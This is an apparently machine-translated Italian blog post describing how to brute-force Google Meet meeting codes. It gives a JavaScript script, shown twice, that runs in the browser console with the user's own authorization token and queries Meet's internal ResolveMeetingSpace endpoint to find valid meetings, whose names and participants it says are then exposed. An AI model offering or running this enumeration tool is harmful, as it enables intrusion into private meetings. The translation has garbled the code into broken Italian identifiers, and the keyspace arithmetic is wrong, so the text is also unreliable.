Visio – Resta bloccato in Google Meet | Dyrk, Dyna Meet – Visio

Incontra Visio

Contents

1 Incontra Visio
- 1.1 Dyrk
- 1.2 Incontra Visio

randomize = () => dico = dico.Diviso (”).Mappa (value => (< value, sort: Math.random() >).incantesimo ((a, b) => a.Incantesimo – b.sorte).CARTA GEOGRAFICA ((< value >) => valore).Giuntura (”),
NewPatternKey = () => “xxx-xxx-xxx”.Diviso (”).Mappa (c => c == ‘-‘?C: String.fromcharcode (matematica.Pavimento (matematica.Casuale ()*25) +97)).Giuntura (”),
Key = newPatterNKey (), contatore = 20;
Next = () => chiave.Diviso (”).Mappa (e => e == ‘-‘ ? E: DICO [DICO.INDICEF (E) + 1> = DICO.lunghezza ? 0: Dico.INDICEF (E) + 1]).Giuntura (”),
Contatore = 0;
MeetLink = ‘https: // Meet.Google.com/’, disponibile toe = () => xhr = new xmlhttpRequest ();
If (Counter ++> = 20) Counter = 0;
Key = newPatterNKey ();
Rendi casuale ();
>
Chiave = next ();
XHR.Aperto (‘get’, meetlink + key);
XHR.ADDEVENTLISNER (‘Load’, (e) => Fetch (MeetLink.Concat (“/$ rpc/google.RTC.incontri.V1.MeetingsPaceService/Resolvemeetingspace “),” Headers “:” Autorizzazione “: autorizzazione,
“Content-Type”: “Applicazione/X-Protobuf”,
“X-Goog-Adep-key”: E.bersaglio.responsabilità.Match (/\ [“https \: \/\/meet \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
“X-GOOG-AUTHUS”: “0”,
“X-Goog-Ecode-Réspose-If-Executable”: “Base64”,
“X-Goog-Meeting-Identifier”: Btoa (‘\ b \ x02 \ x12 \ f’.Concat (chiave)),
>,
“corpo”: “\ n \ f”.Concat (chiave, “0 \ u0001”),
“Metodo”: “post”
>).Quindi (e => e.Testo ())
.Quindi (e => setTimeout (disponibile, 100);
console.Registro (MeetLink.CONCAT (chiave).BeautifyDisplay (38), (E.Sostituisci (/[^a-za-z0-9]/g, “”)+””).BeautyDisplay (38));
>);
>);
XHR.Inviare ();
>;
Corda.prototipo.Beautifydisplay = function (dimensione) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >misurare ? TXT.Lunghezza: dimensione)).Substr (0, dimensione).Concat (‘|’); >,
console.Chiaro ();
disponibile ();
>) ()

Dyrk

Attualmente lavora nel campo della sicurezza informatica, mi trovo regolarmente di fronte a situazioni abbastanza banali.

Ultimo, l’intrusione di una persona durante una riunione .
Fortunatamente, per la sicurezza, Google Meet ha incluso una funzione che consente sia di avvertire i partecipanti che una persona cerca di unirsi alla videoconferenza, ma anche di accettarla o rifiutarla.

Tuttavia, questo evento mi porta a farmi una serie di domande .

Complessità del link Google Meet

Prima di tutto, come è possibile per una persona connettersi a un link di incontro senza essere stato invitato ad esso ?

Dobbiamo considerare la semplicità del link: https: // google.Incontrare.com/Xxx -yyyy -zzzz

Xxx -yyyy -zzzz sono solo caratteri alfabetici tra A e Z, IE 27 possibili combinazioni per ogni personaggio.

Per i matematici, c’è quindi:

27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 possibili combinazioni .

Durata della vita di un link Google Meet

Sebbene ora siamo in grado di comprendere meglio come sono costruiti i collegamenti delle nostre obbligazioni della conferenza “Google Meet”, c’è un aspetto molto importante da tenere conto . La durata della vita di un link Google Meet !

In effetti, tutti possono generare Google Meet riunioni in pochi clic.
Ma dopo alcuni giorni, settimane o mesi . I collegamenti non sono più validi.

I collegamenti generati hanno quindi un certo periodo di validità .

L’eccezione rende eventi “ricorrenti”, ed è qui che diventa interessante.
In attività, ci sono molte opportunità di organizzarsi regolarmente (team / business, giornaliero, settimanale, mensile,, . ).
Quando un dipendente genera questo tipo di evento nella loro agenda, viene generato automaticamente un link Google Meet. Questo è invariabile.
Quindi avrai lo stesso link ogni volta per questo evento.

Con un po ‘di Javascript e Brute Force ?

Con tutti questi elementi, ora siamo attrezzati per spazzare tutte le possibilità e raggiungere un’alta probabilità per rilevare i collegamenti ai videoconocie !

Quindi ho un po ‘di assistenza retrò al funzionamento di Google Meet per scrivere un codice JavaScript che proverà un numero infinito di combinazioni

(C) dyrk.Org 2023-2024 – Meet’s Roulette
(1) Esegui questo script su https: // Google.Incontrare.com

;

Let Authorization = “SAPISIDHASH XXXXXXXXXXXXXX_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX“, dico =” abcdefghijklmnopqrstuvxz “,

randomize = () => dico = dico.Diviso (”).Mappa (value => (< value, sort: Math.random() >).incantesimo ((a, b) => a.Incantesimo – b.sorte).CARTA GEOGRAFICA ((< value >) => valore).Giuntura (”),
NewPatternKey = () => “xxx-xxx-xxx”.Diviso (”).Mappa (c => c == ‘-‘?C: String.fromcharcode (matematica.Pavimento (matematica.Casuale ()*25) +97)).Giuntura (”),
Key = newPatterNKey (), contatore = 20;
Next = () => chiave.Diviso (”).Mappa (e => e == ‘-‘ ? E: DICO [DICO.INDICEF (E) + 1> = DICO.lunghezza ? 0: Dico.INDICEF (E) + 1]).Giuntura (”),
Contatore = 0;
MeetLink = ‘https: // Meet.Google.com/’, disponibile toe = () => xhr = new xmlhttpRequest ();
If (Counter ++> = 20) Counter = 0;
Key = newPatterNKey ();
Rendi casuale ();
>
Chiave = next ();
XHR.Aperto (‘get’, meetlink + key);
XHR.ADDEVENTLISNER (‘Load’, (e) => Fetch (MeetLink.Concat (“/$ rpc/google.RTC.incontri.V1.MeetingsPaceService/Resolvemeetingspace “),” Headers “:” Autorizzazione “: autorizzazione,
“Content-Type”: “Applicazione/X-Protobuf”,
“X-Goog-Adep-key”: E.bersaglio.responsabilità.Match (/\ [“https \: \/\/meet \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
“X-GOOG-AUTHUS”: “0”,
“X-Goog-Ecode-Réspose-If-Executable”: “Base64”,
“X-Goog-Meeting-Identifier”: Btoa (‘\ b \ x02 \ x12 \ f’.Concat (chiave)),
>,
“corpo”: “\ n \ f”.Concat (chiave, “0 \ u0001”),
“Metodo”: “post”
>).Quindi (e => e.Testo ())
.Quindi (e =>

SetTimeout (disponibile, 100);
console.Registro (MeetLink.CONCAT (chiave).BeautifyDisplay (38), (E.Sostituisci (/[^a-za-z0-9]/g, “”)+””).BeautyDisplay (38));
>);
>);
XHR.Inviare ();
>;
Corda.prototipo.Beautifydisplay = function (dimensione) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >misurare ? TXT.Lunghezza: dimensione)).Substr (0, dimensione).Concat (‘|’); >,
console.Chiaro ();
disponibile ();
>) ()

Per gestire tutto ciò sarà necessario:

Apri la pagina https: // incontra.Google.com
Apri la console per sviluppatori
Nella scheda “Network”, filtra il FETCH / XHR e recupera un token di token“Autorizzazione”
Copia e incolla il codice sorgente sopra e messo sul posto indicava il token.
Convalida con il tasto “ingresso” sulla tastiera.

Recupero del token “Autorizzazione”:

Per i curiosi, questo è il risultato di questa sceneggiatura in azione.
Pertanto, notiamo le linee che ci informa che lo spazio per la videoconferenza non esiste.
E altri che ci hanno messo in scena il segno della conferenza ! Indicando quindi che il collegamento è valido;)

Tuttavia, non aspettarti di cadere in pochi secondi su un link di incontro ^^
(A meno che tu non sia un uomo fortunato)
Dovrai essere grande pazienza, lasciandolo correre almeno mezz’ora.

Conclusione

Non prendere dal panico che c’è un numero maggiore di fortuna per trovare un link Google Meet valido rispetto al loto vincente.

Attenzione ! Una persona che incontra un accesso al link di soddisfazione valido a determinate informazioni senza la necessità di essere connessa:
Il nome della riunione (quindi evita di far scivolare le informazioni riservate) e i partecipanti connessi (tutto o un gioco).

Incontra Visio

Rapina online

Best-seller adesivo per rapina online

Giocatori